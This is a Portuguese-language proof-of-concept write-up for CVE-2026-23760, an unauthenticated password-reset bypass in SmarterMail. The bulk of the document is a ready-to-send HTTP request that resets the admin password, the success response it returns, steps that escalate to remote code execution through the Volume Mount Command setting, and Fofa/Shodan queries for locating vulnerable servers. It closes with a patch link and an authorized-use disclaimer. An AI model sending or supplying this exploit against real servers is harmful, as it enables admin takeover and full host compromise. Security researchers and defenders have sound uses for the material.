
CVE-2026-23760 - Uma bypass de autenticação via API de redefinição de senha no SmarterMail.
Uma prova de conceito que explora uma bypass de autenticação via API de redefinição de senha para a conta de administrador do sistema SmarterMail.
A vulnerabilidade existe devido a uma falha de bypass de autenticação na API de redefinição de senha. O endpoint force-reset-password permite requisições anônimas e não verifica a senha existente ou um token de redefinição ao redefinir contas de administrador do sistema.
O PoC é tão simples quanto isto:
POST /api/v1/auth/force-reset-password HTTP/1.1
Host: xxxxxxx:9998
Content-Type: application/json
Content-Length: 145
{"IsSysAdmin":"true",
"OldPassword":"watever",
"Username":"admin",
"NewPassword":"NewPassword123!@#",
"ConfirmPassword": "NewPassword123!@#"}
Você deve receber a seguinte resposta, que confirma que a senha foi modificada com sucesso:
{
"username":"",
"errorCode":"",
"errorData":"",
"debugInfo":"check1\\r\\ncheck2\\r\\ncheck3\\r\\ncheck4.2\\r\\ncheck5.2\\r\\ncheck6.2\\r\\ncheck7.2\\r\\ncheck8.2\\r\\n",
"success":true,
"resultCode":200
}
O único requisito restante é saber o nome de usuário da conta de administrador.
Uma vez autenticado como administrador do sistema, um atacante pode:
Settings -> Volume Mounts.Volume Mount Command.Esse comando é executado pelo sistema operacional subjacente. Nesse ponto, o atacante alcançou execução remota completa de código no host.
Quando a configuração é salva, o comando fornecido é executado imediatamente.
Template Nuclei:
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2026/CVE-2026-23760.yaml
FOFA:
title='SmarterMail'
SHODAN:
html:'SmarterMail'
Um atacante remoto não autenticado pode contornar a autenticação da conta de administrador do sistema e obter acesso. Uma vez autenticado, ele pode realizar execução remota completa de código no host.
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N - 9.3:Crítico
Atualize para a versão mais recente: https://www.smartertools.com/smartermail/downloads
Esta ferramenta é apenas para testes de segurança autorizados. O acesso não autorizado a sistemas de computador é ilegal.